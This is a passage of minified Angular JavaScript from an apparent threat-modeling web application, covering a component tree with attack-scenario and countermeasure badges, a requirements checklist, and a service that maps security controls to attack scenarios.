.mat-tab-label{height:25px}.tabGroup[_ngcontent-%COMP%]     .mat-tab-labels .mat-tab-label{min-width:120px}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();const Mgt=["search"];function vgt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"input",8,9),he("ngModelChange",function(n){return be(e),Me(B().searchString=n)}),oe(4,"translate"),u(),s(5,"\n    "),m(6,"button",10),he("click",function(){be(e);const n=B();return Me(n.keepTreeStructure=!n.keepTreeStructure)}),oe(7,"translate"),s(8,"\n      "),m(9,"mat-icon"),s(10,"account_tree"),u(),s(11,"\n    "),u(),s(12,"\n    "),m(13,"button",11),he("click",function(){return be(e),Me(B().searchString=null)}),oe(14,"translate"),s(15,"\n      "),m(16,"mat-icon"),s(17,"close"),u(),s(18,"\n    "),u(),s(19,"\n  "),Mt()}if(2&t){const e=B();C(2),ri("color-scheme",e.theme.IsDarkMode?"dark":"initial"),at("placeholder",re(4,8,"general.Search")),V("ngModel",e.searchString),C(4),ri("opacity",e.keepTreeStructure?1:.5),at("matTooltip",re(7,10,"pages.modeling.containertree.keepTreeStructure")),C(7),at("matTooltip",re(14,12,"general.Close"))}}function Agt(t,a){if(1&t&&(m(0,"mat-icon",19),s(1,"flash_on"),u()),2&t){const e=B().$implicit;V("matBadge",B().GetNodeScenarios(e))}}function Tgt(t,a){if(1&t&&(m(0,"mat-icon",20),s(1,"security"),u()),2&t){const e=B().$implicit;V("matBadge",B().GetNodeMeasures(e))}}function Egt(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){be(e);const n=B().$implicit;return Me(B().filteredElement=n)}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"filter_alt"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.containertree.filter"))}function Dgt(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(B(2).filteredElement=null)}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"filter_alt_off"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.containertree.filterOff"))}function xgt(t,a){if(1&t){const e=Ye();m(0,"mat-tree-node",12),he("click",function(){const r=be(e).$implicit;return Me(B().OnNodeClicked(r))}),s(1,"\n      "),m(2,"span",13),s(3),u(),s(4,"\xa0"),m(5,"span",14),s(6),u(),s(7," \n      "),ne(8,Agt,2,1,"mat-icon",15),s(9,"\n      "),ne(10,Tgt,2,1,"mat-icon",16),s(11,"\n      "),ne(12,Egt,6,3,"button",17),s(13,"\n      "),ne(14,Dgt,6,3,"button",18),s(15,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();ri("display",i.searchString&&i.hideLeafNode(e)?"none":"flex"),Ct("highlight-light",i.isSelected(e)&&!i.theme.IsDarkMode)("highlight-dark",i.isSelected(e)&&i.theme.IsDarkMode),V("id",e.ID),C(3),ke(e.GetProperty("Name")),C(3),ke(i.GetNodeInfo(e)),C(2),V("ngIf",i.ShowScenarios&&i.GetNodeScenarios(e)>0),C(2),V("ngIf",i.ShowMeasures&&i.GetNodeMeasures(e)>0),C(2),V("ngIf",e!==i.filteredElement),C(2),V("ngIf",e===i.filteredElement)}}function wgt(t,a){if(1&t&&(m(0,"mat-icon",19),s(1,"flash_on"),u()),2&t){const e=B().$implicit;V("matBadge",B().GetNodeScenarios(e))}}function Igt(t,a){if(1&t&&(m(0,"mat-icon",20),s(1,"security"),u()),2&t){const e=B().$implicit;V("matBadge",B().GetNodeMeasures(e))}}function Rgt(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){be(e);const n=B().$implicit;return Me(B().filteredElement=n)}),oe(1,"translate"),s(2,"\n          "),m(3,"mat-icon"),s(4,"filter_alt"),u(),s(5,"\n        "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.containertree.filter"))}function Sgt(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(B(2).filteredElement=null)}),oe(1,"translate"),s(2,"\n          "),m(3,"mat-icon"),s(4,"filter_alt_off"),u(),s(5,"\n        "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.containertree.filterOff"))}function kgt(t,a){if(1&t){const e=Ye();m(0,"mat-nested-tree-node",23),s(1,"\n      "),m(2,"div",24),he("click",function(){const r=be(e).$implicit;return Me(B().OnNodeClicked(r))}),s(3,"\n        "),m(4,"button",25),s(5,"\n          "),m(6,"mat-icon",26),s(7),u(),s(8,"\n        "),u(),s(9,"\n        "),m(10,"span",13),s(11),u(),s(12,"\n        "),ne(13,wgt,2,1,"mat-icon",15),s(14,"\n        "),ne(15,Igt,2,1,"mat-icon",16),s(16,"\n        "),ne(17,Rgt,6,3,"button",17),s(18,"\n        "),ne(19,Sgt,6,3,"button",18),s(20,"\n      "),u(),s(21,"\n      "),s(22,"\n      "),m(23,"div",27),s(24,"\n        "),Ir(25,28),s(26,"\n      "),u(),s(27,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();V("id",e.ID),C(2),ri("display",i.searchString&&i.hideParentNode(e)?"none":"flex"),Ct("highlight-light",i.isSelected(e)&&!i.theme.IsDarkMode)("highlight-dark",i.isSelected(e)&&i.theme.IsDarkMode),C(5),ct("\n            ",i.treeControl.isExpanded(e)?"expand_more":"chevron_right","\n          "),C(4),ke(e.GetProperty("Name")),C(2),V("ngIf",i.ShowScenarios&&i.GetNodeScenarios(e)>0),C(2),V("ngIf",i.ShowMeasures&&i.GetNodeMeasures(e)>0),C(2),V("ngIf",e!==i.filteredElement),C(2),V("ngIf",e===i.filteredElement),C(4),Ct("element-tree-invisible",!i.treeControl.isExpanded(e))}}function Pgt(t,a){if(1&t){const e=Ye();s(0,"\n    "),m(1,"button",29),he("click",function(){return be(e),Me(B().searchString="")}),s(2,"\n      "),m(3,"mat-icon"),s(4,"search"),u(),s(5,"\n      "),m(6,"span"),s(7),oe(8,"translate"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",30),he("click",function(){return be(e),Me(B().filteredElement=null)}),s(12,"\n      "),m(13,"mat-icon"),s(14,"filter_alt_off"),u(),s(15,"\n      "),m(16,"span"),s(17),oe(18,"translate"),u(),s(19,"\n    "),u(),s(20,"\n    "),m(21,"button",31),s(22,"\n      "),m(23,"mat-icon"),s(24,"info"),u(),s(25,"\n      "),m(26,"mat-slide-toggle",32),he("ngModelChange",function(n){return be(e),Me(B().ShowScenarios=n)})("click",function(n){return n.stopPropagation()}),s(27),oe(28,"translate"),u(),s(29,"\n    "),u(),s(30,"\n    "),m(31,"button",31),s(32,"\n      "),m(33,"mat-icon"),s(34,"info"),u(),s(35,"\n      "),m(36,"mat-slide-toggle",32),he("ngModelChange",function(n){return be(e),Me(B().ShowMeasures=n)})("click",function(n){return n.stopPropagation()}),s(37),oe(38,"translate"),u(),s(39,"\n    "),u(),s(40,"\n  ")}if(2&t){const e=B();C(7),ke(re(8,7,"general.Search")),C(4),V("disabled",null==e.filteredElement),C(6),ke(re(18,9,"pages.modeling.containertree.filterReset")),C(9),V("ngModel",e.ShowScenarios),C(1),ct("\n        ",re(28,11,"general.AttackScenarios"),"\n      "),C(9),V("ngModel",e.ShowMeasures),C(1),ct("\n        ",re(38,13,"general.Countermeasures"),"\n      ")}}let Ogt=(()=>{class t{constructor(e,i,n){this.dataService=e,this.theme=i,this.locStorage=n,this.infoMap=new Map,this.scenarioMap=new Map,this.measureMap=new Map,this.showScenarios=null,this.showMeasures=null,this.treeControl=new Rz(r=>{if(this.isContainer(r))return r.GetChildren()}),this.dataSource=new HW,this.searchString=null,this.selectionChanged=new Tt,this.filterChanged=new Tt,this.hasChild=(r,c)=>this.isContainer(c)&&c.GetChildren().length>0}isContainer(e){return e&&e.GetChildren&&"function"==typeof e.GetChildren}get ShowScenarios(){if(null==this.showScenarios){const e=this.locStorage.Get(si.PAGE_MODELING_CONTAINERTREE_SHOW_SCEN);this.showScenarios="true"==e||null==e}return this.showScenarios}set ShowScenarios(e){this.locStorage.Set(si.PAGE_MODELING_CONTAINERTREE_SHOW_SCEN,String(e)),this.showScenarios=e}get ShowMeasures(){if(null==this.showMeasures){const e=this.locStorage.Get(si.PAGE_MODELING_CONTAINERTREE_SHOW_MEAS);this.showMeasures="true"==e||null==e}return this.showMeasures}set ShowMeasures(e){this.locStorage.Set(si.PAGE_MODELING_CONTAINERTREE_SHOW_MEAS,String(e)),this.showMeasures=e}get keepTreeStructure(){const e=this.locStorage.Get(si.PAGE_MODELING_CONTAINERTREE_KEEP_STRUC);return"true"==e||null==e}set keepTreeStructure(e){this.locStorage.Set(si.PAGE_MODELING_CONTAINERTREE_KEEP_STRUC,String(e))}get elements(){return this._elements}set elements(e){this._elements=e,this.selectedElement=this.filteredElement=null,null!=this.searchString&&(this.searchString=""),this.RefreshTree()}get selectedElement(){return this._selectedElement}set selectedElement(e){if(this._selectedElement=e,e){let i=this.leafNodes.find(n=>n.nativeElement.id===e.ID);i||(i=this.nestedNodes.find(n=>n.nativeElement.id===e.ID)),null==i||i.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})}}get filteredElement(){return this._filteredElement}set filteredElement(e){this._filteredElement=e,this.filterChanged.emit(e)}set input(e){e&&setTimeout(()=>{e.nativeElement.focus()})}ngOnInit(){this.dataService.Project.AttackScenariosChanged.subscribe(e=>this.scenarioMap=new Map),this.dataService.Project.CountermeasuresChanged.subscribe(e=>this.measureMap=new Map),this.RefreshTree()}GetNodeInfo(e){var i,n;if(this.infoMap.has(e.ID))return this.infoMap.get(e.ID);if(e instanceof rs&&e.Sender&&e.Receiver){if(!e.ShowName){let r="\u2192";return e.ArrowPos==wn.Both?r="\u2194":e.ArrowPos==wn.Start&&(r="\u2190"),"("+(null===(i=e.Sender)||void 0===i?void 0:i.GetProperty("Name"))+r+(null===(n=e.Receiver)||void 0===n?void 0:n.GetProperty("Name"))+")"}}else this.infoMap.set(e.ID,"");return""}GetNodeScenarios(e){if(this.scenarioMap.has(e.ID))return this.scenarioMap.get(e.ID);const i=this.dataService.Project.GetAttackScenariosApplicable().filter(n=>{var r;return n.Target==e||(null===(r=n.Targets)||void 0===r?void 0:r.includes(e))}).length;return this.scenarioMap.set(e.ID,i),i}GetNodeMeasures(e){if(this.measureMap.has(e.ID))return this.measureMap.get(e.ID);const i=this.dataService.Project.GetCountermeasuresApplicable().filter(n=>n.Targets.includes(e)).length;return this.measureMap.set(e.ID,i),i}RefreshTree(){this.dataSource.data=null,this.elements&&(this.dataSource.data=[this.elements],this.subscription&&this.subscription.unsubscribe(),this.subscription=this.elements.ChildrenChanged.subscribe(e=>{this.RefreshTree()}),this.dataSource.data.forEach(e=>this.treeControl.expandDescendants(e)))}OnNodeClicked(e){var i;e!=this.elements&&(this.selectedElement=e,null===(i=this.selectionChanged)||void 0===i||i.emit(e))}hideLeafNode(e){return!1===new RegExp(this.searchString,"i").test(e.GetProperty("Name"))}hideParentNode(e){return this.hideLeafNode(e)&&(!this.keepTreeStructure||this.treeControl.getDescendants(e).every(i=>this.hideLeafNode(i)))}isSelected(e){var i;return(null===(i=this.selectedElement)||void 0===i?void 0:i.ID)==(null==e?void 0:e.ID)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-container-tree"]],viewQuery:function(e,i){if(1&e&&(Mi(Mgt,5),Mi(Y3,5,mi),Mi(J3,5,mi)),2&e){let n;Vt(n=Bt())&&(i.input=n.first),Vt(n=Bt())&&(i.leafNodes=n),Vt(n=Bt())&&(i.nestedNodes=n)}},inputs:{elements:"elements",selectedElement:"selectedElement",filteredElement:"filteredElement"},outputs:{selectionChanged:"selectionChanged",filterChanged:"filterChanged"},decls:27,vars:8,consts:[[2,"position","relative"],["mat-icon-button","","matTooltipShowDelay","1000",1,"moreBtn",3,"matMenuTriggerFor","matTooltip"],[4,"ngIf"],[1,"element-tree",2,"background-color","transparent",3,"dataSource","treeControl"],["matTreeNodeToggle","","class","onHover",3,"id","display","highlight-light","highlight-dark","click",4,"matTreeNodeDef"],[3,"id",4,"matTreeNodeDef","matTreeNodeDefWhen"],["moreMenu","matMenu"],["matMenuContent",""],["autofocus","",1,"searchBox",3,"ngModel","placeholder","ngModelChange"],["search",""],["mat-icon-button","","matTooltipShowDelay","1000",1,"small-icon-button",2,"right","42px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",1,"small-icon-button",2,"right","25px",3,"matTooltip","click"],["matTreeNodeToggle","",1,"onHover",3,"id","click"],[2,"font-size","small"],[2,"font-size","x-small"],["class","scenarioBadge","matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below",3,"matBadge",4,"ngIf"],["class","measureBadge","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",3,"matBadge",4,"ngIf"],["mat-icon-button","","class","hoverIcon","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below",1,"scenarioBadge",3,"matBadge"],["matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",1,"measureBadge",3,"matBadge"],["mat-icon-button","","matTooltipShowDelay","1000",1,"hoverIcon",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"id"],[1,"mat-tree-node","onHover",3,"click"],["mat-icon-button","","matTreeNodeToggle",""],[1,"mat-icon-rtl-mirror"],["role","group"],["matTreeNodeOutlet",""],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"button",1),oe(3,"translate"),s(4,"\n    "),m(5,"mat-icon"),s(6,"more_vert"),u(),s(7,"\n  "),u(),s(8,"\n  "),ne(9,vgt,20,14,"ng-container",2),s(10,"\n  "),m(11,"mat-tree",3),s(12,"\n    "),s(13,"\n    "),s(14,"\n    "),ne(15,xgt,16,13,"mat-tree-node",4),s(16,"\n    "),s(17,"\n    "),ne(18,kgt,28,15,"mat-nested-tree-node",5),s(19,"\n  "),u(),s(20,"\n"),u(),s(21,"\n"),m(22,"mat-menu",null,6),s(24,"\n  "),ne(25,Pgt,41,15,"ng-template",7),s(26," \n"),u()),2&e){const n=Ti(23);C(2),at("matTooltip",re(3,6,"general.More")),V("matMenuTriggerFor",n),C(7),V("ngIf",null!=i.searchString),C(2),V("dataSource",i.dataSource)("treeControl",i.treeControl),C(7),V("matTreeNodeDefWhen",i.hasChild)}},dependencies:[Ri,an,Ta,Ea,oa,Hh,J3,Kw,Yw,Xw,Y3,ab,da,Xo,qo,po,el,Pa,Mg,Xi],styles:[".mat-tree-node[_ngcontent-%COMP%]{min-height:26px!important;height:26px}.element-tree-invisible[_ngcontent-%COMP%]{display:none}.element-tree[_ngcontent-%COMP%]   ul[_ngcontent-%COMP%], .element-tree[_ngcontent-%COMP%]   li[_ngcontent-%COMP%]{margin-top:0;margin-bottom:0;list-style-type:none}.onHover[_ngcontent-%COMP%]   .hoverIcon[_ngcontent-%COMP%]{display:none}.onHover[_ngcontent-%COMP%]:hover   .hoverIcon[_ngcontent-%COMP%]{display:block}.moreBtn[_ngcontent-%COMP%]{position:absolute;top:0;right:0;width:25px;height:25px;line-height:25px}.searchBox[_ngcontent-%COMP%]{position:absolute;top:3px;right:27px;width:100px;height:15px;line-height:15px;font-size:x-small}.small-icon-button[_ngcontent-%COMP%]{position:absolute;top:1px;width:24px!important;height:24px!important;line-height:24px!important}.small-icon-button[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{width:16px!important;height:16px!important;line-height:16px!important}.small-icon-button[_ngcontent-%COMP%]   .material-icons[_ngcontent-%COMP%]{font-size:16px!important}.element-tree[_ngcontent-%COMP%]   .mat-nested-tree-node[_ngcontent-%COMP%]   div[role=group][_ngcontent-%COMP%]{padding-left:10px}.element-tree[_ngcontent-%COMP%]   div[role=group][_ngcontent-%COMP%] > .mat-tree-node[_ngcontent-%COMP%]{padding-left:40px}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.scenarioBadge[_ngcontent-%COMP%]     .mat-badge-content{right:-3px!important;bottom:-3px!important}.measureBadge[_ngcontent-%COMP%]     .mat-badge-content{right:-6px!important;bottom:-3px!important}"]}),t})();function Ngt(t,a){if(1&t&&(m(0,"th",6),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Abbr)}}function Lgt(t,a){if(1&t&&(m(0,"mat-icon"),s(1),u()),2&t){const e=B().index,i=B().$implicit,n=B();C(1),ke(n.GetCellStatus(i,e)?"done":"close")}}function zgt(t,a){if(1&t){const e=Ye();m(0,"td",10),he("click",function(){const r=be(e).index,c=B().$implicit;return Me(B().OnRequirementClick(c,r))}),s(1,"\n        "),ne(2,Lgt,2,1,"mat-icon",11),s(3,"\n      "),u()}if(2&t){const e=a.index,i=B().$implicit,n=B();ri("background-color",n.GetBackgroundColor(i,e)),C(2),V("ngIf",null!=n.GetCellStatus(i,e))}}function Wgt(t,a){if(1&t){const e=Ye();m(0,"button",12),he("click",function(){return be(e),Me(B().$implicit.value.NeedsReview=!1)}),oe(1,"translate"),s(2,"\n          "),m(3,"mat-icon"),s(4,"thumb_up"),u(),s(5,"\n        "),u()}2&t&&at("matTooltip",re(1,1,"general.OK"))}function Fgt(t,a){if(1&t){const e=Ye();m(0,"button",12),he("click",function(){be(e);const n=B().$implicit;return Me(B().UpdateValues(n))}),oe(1,"translate"),s(2,"\n          "),m(3,"mat-icon"),s(4,"update"),u(),s(5,"\n        "),u()}2&t&&at("matTooltip",re(1,1,"general.Update"))}function Vgt(t,a){if(1&t&&(m(0,"tr"),s(1,"\n      "),m(2,"td")(3,"span"),s(4),u()(),s(5,"\n      "),ne(6,zgt,4,3,"td",7),s(7,"\n      "),m(8,"td",8),s(9,"\n        "),ne(10,Wgt,6,3,"button",9),s(11,"\n        "),ne(12,Fgt,6,3,"button",9),s(13,"\n      "),u(),s(14,"\n    "),u()),2&t){const e=a.$implicit,i=B();C(3),ri("margin-left",(20*e.level).toString()+"px"),C(1),ke(e.requirement.Name),C(2),V("ngForOf",i.checklist.Type.Levels),C(4),V("ngIf",e.value.NeedsReview),C(2),V("ngIf",e.updateAvailable)}}let Bgt=(()=>{class t{constructor(e){this.dataService=e,this.Requirements=[]}ngOnInit(){let e=this.dataService.Project.GetDevices().find(n=>n.Checklists.includes(this.checklist)),i=(n,r)=>{n.forEach(c=>{let d=!1,T=this.checklist.RequirementValues.find(q=>q.RequirementTypeID==c.ID);if(T){let q=c.EvalRequirement(e);if(q)if(q.length!=T.Values.length)d=!0;else for(let Y=0;Y<q.length;Y++)q[Y]!=T.Values[Y]&&(d=!0)}else{T={RequirementTypeID:c.ID,NeedsReview:!1,Values:new Array(this.checklist.Type.Levels.length).fill(!1)},this.checklist.RequirementValues.push(T);let q=c.EvalRequirement(e);q&&(T.Values=q,T.NeedsReview=c.ReqFulfillRule.NeedsReview)}this.Requirements.push({requirement:c,level:r,value:T,updateAvailable:d}),c.SubReqTypes.length>0&&i(c.SubReqTypes,r+1)})};i(this.checklist.Type.RequirementTypes,0)}UpdateValues(e){let i=this.dataService.Project.GetDevices().find(r=>r.Checklists.includes(this.checklist)),n=e.requirement.EvalRequirement(i);n&&(e.value.Values=n,e.updateAvailable=!1,e.value.NeedsReview=!0)}OnRequirementClick(e,i){if(e.value.Values[i]=!e.value.Values[i],e.value.Values[i])for(let n=i;n<e.value.Values.length;n++)e.value.Values[n]=!0}GetCellStatus(e,i){return e.requirement.RequiredPerLevel[i]?!!e.value.Values[i]:null}GetBackgroundColor(e,i){let n=this.GetCellStatus(e,i);return n?"#589758":0==n?"#b15b5b":"transparent"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-checklist"]],inputs:{checklist:"checklist"},decls:28,vars:8,consts:[[2,"margin","10px"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"border-spacing","2px 2px"],["style","text-align: center; padding: 0 3px;","matTooltipShowDelay","1000",3,"matTooltip",4,"ngFor","ngForOf"],[4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",2,"text-align","center","padding","0 3px",3,"matTooltip"],["style","text-align: center; height: 25px; min-width: 30px;",3,"backgroundColor","click",4,"ngFor","ngForOf"],[2,"height","20px"],["mat-icon-button","","class","doneBtn","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],[2,"text-align","center","height","25px","min-width","30px",3,"click"],[4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"doneBtn",3,"matTooltip","click"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),m(5,"mat-form-field",1),s(6,"\n    "),m(7,"mat-label"),s(8),oe(9,"translate"),u(),s(10,"\n    "),m(11,"textarea",2),he("ngModelChange",function(r){return i.checklist.Description=r}),u(),s(12,"\n  "),u(),s(13,"\n  "),m(14,"table",3),s(15,"\n    "),m(16,"tr"),s(17,"\n      "),it(18,"th"),s(19,"\n      "),ne(20,Ngt,2,2,"th",4),s(21,"\n      "),it(22,"th"),s(23,"\n    "),u(),s(24,"\n    "),ne(25,Vgt,15,6,"tr",5),s(26,"\n  "),u(),s(27,"\n"),u()),2&e&&(C(3),ke(i.checklist.Name),C(5),ke(re(9,6,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.checklist.Description),C(9),V("ngForOf",i.checklist.Type.Levels),C(5),V("ngForOf",i.Requirements))},dependencies:[Zi,Ri,an,Ta,Ea,oa,da,nn,un,Go,Xa,Pa,Xi],styles:[".doneBtn[_ngcontent-%COMP%]{height:16px!important;line-height:14px!important;transform:scale(.7);width:25px}"]}),t})(),Hgt=(()=>{class t{constructor(e){this.dataService=e}GenerateDiagramMitigations(e){return this.generateMitigations(e.ID)}GenerateStackMitigations(e){return this.generateMitigations(e.ID)}generateMitigations(e){let i=this.dataService.Project,n=this.dataService.Config;i.GetCountermeasures().filter(k=>k.ViewID==e&&k.MappingState==zn.New).forEach(k=>k.MappingState=zn.Stable);let r=i.GetCountermeasures().filter(k=>k.ViewID==e&&k.IsGenerated);r.forEach(k=>k.RuleStillApplies=!0),r.filter(k=>k.MappingState==zn.Removed).forEach(k=>i.DeleteCountermeasure(k)),r=r.filter(k=>k.MappingState!=zn.Removed);let c=[];return r.forEach(k=>c.push({map:k,attackScenarioIDs:k.AttackScenarios.map(q=>null==q?void 0:q.ID),targetIDs:k.Targets.map(q=>null==q?void 0:q.ID)})),(k=>{let q=n.GetControls();k.forEach(Y=>{let te=q.filter(pe=>pe.MitigatedAttackVectors.includes(Y.AttackVector));te.push(...q.filter(pe=>pe.MitigatedThreatRules.includes(Y.ThreatRule))),te.forEach(pe=>{let Re;Re=Y.Target?[Y.Target]:Y.Targets;const Fe=i.GetCountermeasures().find(Ne=>Ne.Control==pe&&(Ne.AttackScenarios.includes(Y)||Ne.Targets.includes(Y.Target)||Ne.Targets.some(et=>Y.Targets.includes(et))));if(Fe){Fe.MappingState=zn.Stable,r.splice(r.findIndex(et=>et.ID==Fe.ID),1),Fe.AddAttackScenario(Y),Re.forEach(et=>Fe.AddTarget(et));const Ne=c.find(et=>et.map==Fe);if(Ne){let et=Ne.attackScenarioIDs.indexOf(Y.ID);et>=0&&Ne.attackScenarioIDs.splice(et,1),Re.forEach(ut=>{et=Ne.targetIDs.indexOf(ut.ID),et>=0&&Ne.targetIDs.splice(et,1)})}}else i.CreateCountermeasure(e,!0).SetMapping(pe,Re,[Y])})})})(i.GetAttackScenarios().filter(k=>k.ViewID==e&&(k.AttackVector||k.ThreatRule)&&[zn.New,zn.Stable].includes(k.MappingState))),r.forEach(k=>{k.MitigationState==Ra.NotSet?k.MappingState=zn.Removed:k.RuleStillApplies=!1}),c.forEach(k=>{if(k.map.MappingState!=zn.Removed){for(let q=0;q<k.targetIDs.length;q++)k.targetIDs[q]&&(k.map.RemoveTarget(k.targetIDs[q]),k.targetIDs.splice(q,1),q--);(k.targetIDs.length>0||k.attackScenarioIDs.length>0)&&k.map.CleanUpReferences()}}),i.GetCountermeasures().filter(k=>k.ViewID==e).filter(k=>0==k.AttackScenarios.length&&0==k.Targets.length).forEach(k=>{k.MappingState=zn.Removed}),i.GetCountermeasures().filter(k=>k.ViewID==e)}}return t.\u0275fac=function(e){return new(e||t)(At(Yi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ugt(t,a){1&t&&it(0,"mat-progress-spinner",30),2&t&&V("diameter",20)}function qgt(t,a){if(1&t&&(m(0,"span",31),s(1),u()),2&t){const e=B();C(1),ke(e.GetApplicableCount())}}function Ggt(t,a){1&t&&(m(0,"th",32),s(1," "),u())}function jgt(t,a){if(1&t&&(m(0,"td",33),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetStateIcon(e))}}function Qgt(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function $gt(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function Kgt(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function Xgt(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function Ygt(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function Jgt(t,a){if(1&t&&(m(0,"td",33),s(1," "),m(2,"mat-icon",35),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=B();C(2),at("matTooltip",re(3,2,i.GetCreationTypeIconTooltip(e))),C(2),ke(i.GetCreationTypeIcon(e))}}function Zgt(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Control")," "))}function e0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.Control?null:e.Control.GetProperty("Name")," ")}}function t0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.AttackVectors")," "))}function i0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetAttackVectors(e)," ")}}function a0t(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Progress")," "))}function n0t(t,a){1&t&&it(0,"mat-progress-bar",38),2&t&&V("value",B().$implicit.MitigationProcess.Progress)}function o0t(t,a){if(1&t&&(m(0,"td",33),s(1," \n          "),ne(2,n0t,1,1,"mat-progress-bar",37),s(3,"\n        "),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.MitigationProcess)}}function r0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function s0t(t,a){if(1&t&&(m(0,"option",41),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function c0t(t,a){if(1&t){const e=Ye();m(0,"td",33),s(1,"\n          "),m(2,"select",39),he("ngModelChange",function(n){return Me(be(e).$implicit.MitigationState=n)}),s(3,"\n            "),ne(4,s0t,3,4,"option",40),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.MitigationState),C(2),V("ngForOf",i.GetMitigationStates())}}function l0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Targets")," "))}function d0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function m0t(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function u0t(t,a){if(1&t){const e=Ye();m(0,"td",33),s(1," "),m(2,"mat-icon",42),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function h0t(t,a){1&t&&it(0,"tr",43)}function f0t(t,a){if(1&t){const e=Ye();m(0,"tr",44),he("click",function(){const r=be(e).$implicit;return Me(B().SelectCountermeasure(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("selected-item",i.IsCountermeasureSelected(e))("removed-item",i.IsCountermeasureRemoved(e)||i.IsCountermeasureNotApplying(e)||i.IsCountermeasureRejected(e)||i.IsCountermeasureDuplicated(e)),V("id",e.ID)}}function p0t(t,a){if(1&t){const e=Ye();m(0,"tr",45),s(1,"\n        "),m(2,"td",46),he("contextmenu",function(n){return 